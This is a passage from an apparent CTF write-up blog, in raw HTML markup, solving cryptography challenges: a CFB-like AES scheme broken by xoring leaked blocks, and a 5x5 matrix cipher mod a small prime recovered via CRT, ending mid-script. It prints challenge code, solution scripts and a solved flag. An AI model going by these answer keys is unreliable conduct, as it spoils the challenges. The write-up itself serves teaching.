class="bp">self</span><span class="o">.</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_ECB</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">blockify</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">message</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">[</span><span class="n">message</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span> <span class="o">+</span> <span class="n">size</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">message</span><span class="p">),</span> <span class="n">size</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">xor</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="nb">bytes</span><span class="p">([</span><span class="n">_a</span> <span class="o">^</span> <span class="n">_b</span><span class="p">])</span> <span class="k">for</span> <span class="n">_a</span><span class="p">,</span> <span class="n">_b</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">encrypt</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">iv</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">urandom</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">ciphertext</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">plaintext</span> <span class="o">=</span> <span class="n">iv</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">blocks</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">blockify</span><span class="p">(</span><span class="n">message</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">block</span> <span class="ow">in</span> <span class="n">blocks</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">ct</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">cipher</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">plaintext</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">encrypted_block</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">xor</span><span class="p">(</span><span class="n">block</span><span class="p">,</span> <span class="n">ct</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">ciphertext</span> <span class="o">+=</span> <span class="n">encrypted_block</span> </span></span><span class="line"><span class="cl"> <span class="n">plaintext</span> <span class="o">=</span> <span class="n">encrypted_block</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">ciphertext</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">leak</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">blocks</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">blocks</span><span class="p">)</span> <span class="o">-</span> <span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">leak</span> <span class="o">=</span> <span class="p">[</span><span class="bp">self</span><span class="o">.</span><span class="n">cipher</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">blocks</span><span class="p">[</span><span class="n">i</span><span class="p">])</span><span class="o">.</span><span class="n">hex</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="p">[</span><span class="n">r</span><span class="p">,</span> <span class="n">r</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]]</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">r</span><span class="p">,</span> <span class="n">leak</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">aes</span> <span class="o">=</span> <span class="n">CAES</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">message</span> <span class="o">=</span> <span class="n">pad</span><span class="p">(</span><span class="n">FLAG</span> <span class="o">*</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">ciphertext</span> <span class="o">=</span> <span class="n">aes</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">ciphertext_blocks</span> <span class="o">=</span> <span class="n">aes</span><span class="o">.</span><span class="n">blockify</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="p">,</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">aes</span><span class="o">.</span><span class="n">leak</span><span class="p">(</span><span class="n">ciphertext_blocks</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;output.txt&#39;</span><span class="p">,</span> <span class="s1">&#39;w&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;ct = </span><span class="si">{</span><span class="n">ciphertext</span><span class="o">.</span><span class="n">hex</span><span class="p">()</span><span class="si">}</span><span class="se">\n</span><span class="s1">r = </span><span class="si">{</span><span class="n">r</span><span class="si">}</span><span class="se">\n</span><span class="s1">phrases = </span><span class="si">{</span><span class="n">leak</span><span class="si">}</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></div><p>We also have an output file:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">ct</span> <span class="o">=</span> <span class="n">bc9bc77a809b7f618522d36ef7765e1cad359eef39f0eaa5dc5d85f3ab249e788c9bc36e11d72eee281d1a645027bd96a363c0e24efc6b5caa552b2df4979a5ad41e405576d415a5272ba730e27c593eb2c725031a52b7aa92df4c4e26f116c631630b5d23f11775804a688e5e4d5624</span> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="mi">3</span> </span></span><span class="line"><span class="cl"><span class="n">phrases</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;8b6973611d8b62941043f85cd1483244&#39;</span><span class="p">,</span> <span class="s1">&#39;cf8f71416111f1e8cdee791151c222ad&#39;</span><span class="p">]</span> </span></span></code></pre></div><h3 id="problem-statement-1">Problem Statement</h3> <p>This code defines a class called <code>CAES</code> that implements the AES encryption algorithm in ECB mode. The <code>CAES</code> class has methods to <code>blockify</code> a message into 16-byte blocks, <code>xor</code> two byte arrays, and <code>encrypt</code> a message using AES in ECB mode. Additionally, it has a method called <code>leak</code> that generates a random integer <code>r</code> and returns the encryption of two randomly chosen adjacent 16-byte blocks. The <code>main</code> function of this code creates an instance of the CAES class, generates a message by padded <code>FLAG*4</code>, encrypts the message, and generates a leak using the <code>leak</code> method of the <code>CAES</code> class. Finally, the main function writes the <code>ciphertext</code>, the randomly chosen integer <code>r</code>, and the <code>leak</code> to a file called <code>output.txt</code>.</p> <h3 id="initial-analysis-1">Initial Analysis</h3> <h4 id="the-encryption-method">The encryption method</h4> <p>The <code>encrypt()</code> method is not in ECB mode, it&rsquo;s similar to CBC, which can be visualized by this graph:</p> <img src='encryption.png' alt="Encryption" width="1000"/> <h4 id="the-leaked-data">The Leaked Data</h4> <p>The <code>leak</code> method extracts 2 consecutives blocks of <code>ciphertext</code> and encrypted them using ECB mode. Our leaked data is of ciphertext block 3th and 4th. By using the graph above, we can easily see where the leak data comes from and how to use it to break the system, here is the new graph:</p> <img src='leak.png' alt="Leak" width="1000"/> <h3 id="solution-method-1">Solution Method</h3> <p>The work is simple, just to <code>xor</code> the <code>c[4]</code> with <code>Leak[0]</code> and xor <code>c[5]</code> with <code>Leak[1]</code>, then we can recover the plaintext <code>m[4]</code> and <code>m[5]</code>, respectively. They must be parts of, or entire flag (in any order).</p> <p>Here is the script:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">xor</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="nb">bytes</span><span class="p">([</span><span class="n">_a</span> <span class="o">^</span> <span class="n">_b</span><span class="p">])</span> <span class="k">for</span> <span class="n">_a</span><span class="p">,</span> <span class="n">_b</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">blockify</span><span class="p">(</span><span class="n">message</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">[</span><span class="n">message</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span> <span class="o">+</span> <span class="n">size</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">message</span><span class="p">),</span> <span class="n">size</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"><span class="n">ct</span> <span class="o">=</span> <span class="s1">&#39;bc9bc77a809b7f618522d36ef7765e1cad359eef39f0eaa5dc5d85f3ab249e788c9bc36e11d72eee281d1a645027bd96a363c0e24efc6b5caa552b2df4979a5ad41e405576d415a5272ba730e27c593eb2c725031a52b7aa92df4c4e26f116c631630b5d23f11775804a688e5e4d5624&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="mi">3</span> </span></span><span class="line"><span class="cl"><span class="n">Leak</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;8b6973611d8b62941043f85cd1483244&#39;</span><span class="p">,</span> <span class="s1">&#39;cf8f71416111f1e8cdee791151c222ad&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">Leak</span> <span class="o">=</span> <span class="p">[</span><span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">Leak</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">c</span> <span class="o">=</span> <span class="n">blockify</span><span class="p">(</span><span class="n">ct</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">c</span> <span class="o">=</span> <span class="p">[</span><span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">c</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">xor</span><span class="p">(</span><span class="n">c</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="n">Leak</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">+</span> <span class="n">xor</span><span class="p">(</span><span class="n">c</span><span class="p">[</span><span class="mi">5</span><span class="p">],</span> <span class="n">Leak</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span> </span></span></code></pre></div><h3 id="results-1">Results</h3> <p>Here is the result: <code>b'_w34k_w17h_l34kz}HTB{CFB_15_w34k'</code></p> <p>Flag is: <strong>HTB{CFB_15_w34k_w34k_w17h_l34kz}</strong></p> <h2 id="inside-the-matrix">Inside the Matrix</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1w3gAAQ9VKg6HucPePcDwvUqzlKTWaRbk/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> As you deciphered the Matrix, you discovered that the astronomy scientist had observed that certain stars were not real. He had created two 5x5 matrices with values based on the time the stars were bright, but after some time, the stars stopped emitting light. Nonetheless, he had managed to capture every matrix until then and created an algorithm that simulated their generation. However, he could not understand what was hidden behind them as he was missing something. He believed that if he could understand the stars, he would be able to locate the secret tombs where the relic was hidden.</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Easy</p> </li> </ul> <p>The server script is shown below:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">sage.all_cmdline</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"><span class="c1"># from utils import ascii_print</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">FLAG</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;HTB{????????????????????}&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">FLAG</span><span class="p">)</span> <span class="o">==</span> <span class="mi">25</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Book</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">size</span> <span class="o">=</span> <span class="mi">5</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">prime</span> <span class="o">=</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">parse</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">pt</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">pt</span> <span class="o">=</span> <span class="p">[</span><span class="n">b</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="n">pt</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">matrix</span><span class="p">(</span><span class="n">GF</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">prime</span><span class="p">),</span> <span class="bp">self</span><span class="o">.</span><span class="n">size</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">size</span><span class="p">,</span> <span class="n">pt</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">generate</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">key</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">urandom</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">size</span><span class="o">**</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">key</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">rotate</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">prime</span> <span class="o">=</span> <span class="n">random_prime</span><span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">6</span><span class="p">,</span> <span class="kc">False</span><span class="p">,</span> <span class="mi">2</span><span class="o">**</span><span class="mi">4</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">encrypt</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">message</span><span class="p">:</span> <span class="nb">bytes</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">rotate</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">key</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">generate</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">message</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">ciphertext</span> <span class="o">=</span> <span class="n">message</span> <span class="o">*</span> <span class="n">key</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">ciphertext</span><span class="p">,</span> <span class="n">key</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">menu</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Options:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[L]ook at page&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[T]urn page&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[C]heat</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">option</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">option</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">book</span> <span class="o">=</span> <span class="n">Book</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">ciphertext</span><span class="p">,</span> <span class="n">key</span> <span class="o">=</span> <span class="n">book</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">FLAG</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">page_number</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="kc">True</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">option</span> <span class="o">=</span> <span class="n">menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">option</span> <span class="o">==</span> <span class="s2">&#34;L&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="c1"># ascii_print(ciphertext, key, page_number)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">page_number</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">option</span> <span class="o">==</span> <span class="s2">&#34;T&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">ciphertext</span><span class="p">,</span> <span class="n">key</span> <span class="o">=</span> <span class="n">book</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">FLAG</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">page_number</span> <span class="o">+=</span> <span class="mi">2</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">option</span> <span class="o">==</span> <span class="s2">&#34;C&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;</span><span class="se">\n</span><span class="si">{</span><span class="nb">list</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span><span class="si">}</span><span class="se">\n</span><span class="si">{</span><span class="nb">list</span><span class="p">(</span><span class="n">key</span><span class="p">)</span><span class="si">}</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\n</span><span class="s2">Invalid option!</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;An error occurred: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span></code></pre></div><h3 id="problem-statement-2">Problem Statement</h3> <p>The code defines a class <code>Book</code> that is used to generate a key matrix and encrypt a message using matrix multiplication. The matrix is generated randomly each time a message is encrypted, and its size is fixed at $5\times 5$. The program encrypts a flag, stored in <code>FLAG</code>, using the <code>Book</code> class and presents a menu to the user to interact with the encrypted flag.</p> <p>The main function of the code presents a menu to the user with three options:</p> <ul> <li><code>[L]ook at page</code>: displays the ciphertext and key matrix for the current page number. Here is an example output when you choose this option:</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Options: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">[L]ook at page </span></span><span class="line"><span class="cl">[T]urn page </span></span><span class="line"><span class="cl">[C]heat </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&gt; L </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _________ _________ </span></span><span class="line"><span class="cl"> ______/ 5\ / 6 \_______ </span></span><span class="line"><span class="cl"> /| --------------- | --------------- |\ </span></span><span class="line"><span class="cl">|| Ciphertext:--- - | Key:------------ ||| </span></span><span class="line"><span class="cl">|| ---------------- | ------ -------- ||| </span></span><span class="line"><span class="cl">|| ---------- ----- | ---------------- ||| </span></span><span class="line"><span class="cl">|| [3,12,21,20,8]-- | [18,18,21,26,24] ||| </span></span><span class="line"><span class="cl">|| [1,1,9,7,1]----- | [21,7,10,9,2]--- ||| </span></span><span class="line"><span class="cl">|| [10,3,8,6,13]--- | [22,1,24,22,12]- ||| </span></span><span class="line"><span class="cl">|| [0,19,24,15,12]- | [7,21,7,20,2]--- ||| </span></span><span class="line"><span class="cl">|| [10,4,6,2,4]---- | [26,25,17,3,25]- ||| </span></span><span class="line"><span class="cl">|| ---------------- | ------ ----- --- ||| </span></span><span class="line"><span class="cl">|| --- - ---------- | ---------------- ||| </span></span><span class="line"><span class="cl">||______________ _ | ________________||| </span></span><span class="line"><span class="cl">L/______/---------\\_//W--------\_______\J </span></span></code></pre></div><ul> <li> <p><code>[T]urn page</code>: generates a new key matrix and ciphertext for the next page number.</p> </li> <li> <p><code>[C]heat</code>: displays the ciphertext and key matrix in list type. The Cheat output of above example page is:</p> </li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[(3, 12, 21, 20, 8), (1, 1, 9, 7, 1), (10, 3, 8, 6, 13), (0, 19, 24, 15, 12), (10, 4, 6, 2, 4)] </span></span><span class="line"><span class="cl">[(18, 18, 21, 26, 24), (21, 7, 10, 9, 2), (22, 1, 24, 22, 12), (7, 21, 7, 20, 2), (26, 25, 17, 3, 25)] </span></span></code></pre></div><h3 id="initial-analysis-2">Initial Analysis</h3> <h4 id="primes">Primes</h4> <p>Prime $p$ is changed whenever <code>Turn page</code> option is chosen. Though we don&rsquo;t know what $p$ is, we know that it would be from 16 to 64. There are 12 primes in this range, which are $17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61$.</p> <h4 id="the-encryption">The Encryption</h4> <p>It&rsquo;s just a multiplication between two $5 \times 5$ matrixs over the field of integers modulo $p$:</p> <p>$$C \equiv M\times K (\text{mod } p)$$</p> <p>$$\Leftrightarrow M \equiv C\times K^{-1} (\text{mod } p)$$</p> <h4 id="conclusion-2">Conclusion</h4> <p>We already have key $K$ and ciphertext $C$ by using <code>Cheat option</code>. Then if we know $p$, we can easily recover message $M$ in modulus $p$. Because $p$ is changeable, we can gather several pairs $(M_i, p_i)$ where $i \geq 2$.</p> <h3 id="solution-method-2">Solution Method</h3> <p>Suppose there are some entries in a key $K_1$ which are larger than 59, then $p_1$ must be 61.</p> <p>Suppose all entries in a key $K_2$ are smaller than 17, then it&rsquo;s likely that $p_2$ is 17.</p> <p>If we have $K_1$ and $K_2$, then we can recover $M_1$, $M_2$. By applying CRT (Chinese Remainder Theorem) for 2 pairs $(M_1, 61)$ and $(M_2, 17)$, we can get $M$ in modulus $61\times 17 = 1037$. Because every entries of the actual message&rsquo;s matrix are bytes, they would be smaller than 128 (which is much smaller than 1037). This means our $M$ is actually the message itself.</p> <p>So our mission is just to find $C_1, C_2$ by using <code>Turn page</code> many times. Here is the script after we gather enough materials (I used $p_1=61$ and $p_2=19$):</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">M_1</span> <span class="o">=</span> <span class="p">[</span><span class="mi">11</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">54</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">53</span><span class="p">,</span> <span class="mi">54</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">3</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">M_2</span> <span class="o">=</span> <span class="p">[</span><span class="mi">15</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">11</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">res</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span 